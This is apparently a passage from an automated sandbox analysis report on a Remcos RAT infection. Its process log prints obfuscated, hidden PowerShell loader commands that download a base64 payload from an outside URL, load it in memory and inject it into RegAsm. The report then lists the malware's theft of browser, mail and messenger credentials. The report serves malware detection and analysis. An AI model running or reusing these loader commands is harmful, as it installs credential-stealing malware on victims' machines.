{0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'regas'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [char]34,[char]39,[char]36))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggkfttdhjjbkddjhzlumjvc0vqukvmzvjftknfkvsxldndkydyjy1kb2lujycpicgokcd7mn0nkyd1cicrj2wnkycgpsb7jysnmx0nkydodccrj3qnkydwjysnczovlycrj3inkydhjysndy5naxrojysndwj1c2vyy29udgvudc4nkydjjysnb20vticrj29ezxrly3rpjysnbi8nkydojysnb0rldgunkydjjysnde9ulycrj3inkydlznmnkycvagvhzhmvbwenkydpbi8nkydezxrhjysnae5vdggtjysnvi50jysnehr7mx07ihsyfwjhc2unkyc2nenvbnrlbnqgpsaotmv3lu9ijysnamvjdcbtexn0zw0nkycujysntmv0llcnkydlyknsawvudckurg8nkyd3bmxvywrtdhjpjysnbmcoezj9dxjsktsnkycgezinkyd9ymluyxinkyd5q29udgvudca9ifttexn0zw0ujysnq29udmunkydydf06okzyjysnb21cyscrj3nlnjrtjysndccrj3jpbmcoezj9ymfzzty0q29udgunkydudck7ihsyfwfzc2vtymx5id0gjysnw1jlzmxljysny3rpbycrj24uqxnzzw1ibhldojpmjysnb2fkkhsyjysnfwjpjysnbmenkydyjysneumnkydvbnrljysnbnqpoybbjysnzg5sjysnawiujysnsu8ujysnsg9tjysnzv06oicrj1ynkydbsscrjygnkyd7mh10eccrj3quqycrj0zeuicrj1jxlycrjza4lzc3ms42jysnos40mzeumtkvlzpwdccrj3roezb9lcb7mh1kzxnhdgl2jysnywrveycrjzb9jysnlcb7mh1kzxnhjysndgl2ywrveycrjzb9lccrjyb7mh1kzxnhdgl2jysnywrvezankyd9lcb7mh0nkydszwdbcycrj217mh0nkycsihsnkycwjysnfscrj3snkycwfsx7mh17mccrj30pjykglwygiftdaefyxtm0lftdaefyxtm5lftdaefyxtm2ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( ([string]$verbosepreference)[1,3]+'x'-join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/n'+'odetecto'+'n/'+'n'+'odete'+'c'+'ton/'+'r'+'efs'+'/heads/ma'+'in/'+'deta'+'hnoth-'+'v.t'+'xt{1}; {2}base'+'64content = (new-ob'+'ject system'+'.'+'net.w'+'ebclient).do'+'wnloadstri'+'ng({2}url);'+' {2'+'}binar'+'ycontent = [system.'+'conve'+'rt]::fr'+'omba'+'se64s'+'t'+'ring({2}base64conte'+'nt); {2}assembly = '+'[refle'+'ctio'+'n.assembly]::l'+'oad({2'+'}bi'+'na'+'r'+'yc'+'onte'+'nt); ['+'dnl'+'ib.'+'io.'+'hom'+'e]::'+'v'+'ai'+'('+'{0}tx'+'t.c'+'fdr'+'rw/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'regas'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [char]34,[char]39,[char]36))"Jump to behavior
                  Source: RegAsm.exe, 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChrometibility Mode] - Microsoft Word
                  Source: RegAsm.exe, 0000000D.00000002.953097614.000000000088D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8I\
                  Source: RegAsm.exe, 0000000D.00000002.953097614.000000000088D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: RegAsm.exe, 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmp, logs.dat.13.drBinary or memory string: [Program Manager]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00434CB6 cpuid 13_2_00434CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,13_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,13_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_00451FD0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004489D7 GetSystemTimeAsFileTime,13_2_004489D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041B69E GetComputerNameExW,GetUserNameW,13_2_0041B69E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,13_2_00449210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041739B GetVersionExW,16_2_0041739B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\notpad0\logs.dat, type: DROPPED
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data13_2_0040BA4D
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\13_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db13_2_0040BB6B
                  Searches for Windows Mail specific files
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Tries to steal Mail credentials (via file registry)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword17_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword17_2_00402DB3
